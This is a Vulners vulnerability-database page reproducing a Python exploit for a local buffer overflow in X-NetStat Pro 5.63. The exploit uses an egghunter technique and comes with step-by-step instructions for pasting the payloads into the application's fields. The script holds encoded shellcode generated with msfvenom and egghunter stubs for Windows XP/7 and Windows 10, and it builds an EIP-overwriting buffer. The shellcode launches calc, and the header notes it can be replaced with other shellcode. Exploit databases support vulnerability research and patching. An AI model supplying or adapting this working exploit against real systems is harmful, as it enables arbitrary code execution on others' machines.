Vulners
Lucene search
X-NetStat Pro 5.63 - Local Buffer Overflow
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-23 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Vendor Homepage: https://freshsoftware.com #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe #
# Version: 5.63 #
# Special Thanks to my wife #
# The program has Local Buffer Overflow in several places. #
# Note: Although there are even more simple codes to this vulnerability, #
# this technique (EggHunter) has been used to run vulnerability in different windows versions. #
# Steps : #
# 1- Run python code : X-NetStat.py ( Three files are created ) #
# 2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL" #
# --> Enter --> Close HTTP Client window. #
# 3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok #
# --> Wait a litle --> Shellcode (Calc) open #
# Also Instead of the third stage you can : #
# File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" --> #
# Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#---------------------------------------------------------------------------------------------------------#
#------------------------------------ EGG Shellcode Generation ---------------------------------------
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"
f = open ("egg.txt", "w")
f.write(egg)
f.close()
#--------------------------------- EGG Hunter Shellcode Generation -----------------------------------
#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters
# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c"
egghunter += "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38"
egghunter += "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63"
egghunter += "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f"
egghunter += "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50"
egghunter += "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d"
egghunter += "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56"
egghunter += "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44"
egghunter += "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54"
egghunter += "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75"
egghunter += "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70"
egghunter += "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51"
egghunter += "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41"
# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"
eip = "\x77\x5a\x46"
buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip # Direct Eip Overflow
f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (264 - len(egghunter10)) + eip # Direct Eip Overflow
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Mar 2019 00:00Current
7.4High risk
Vulners AI Score7.4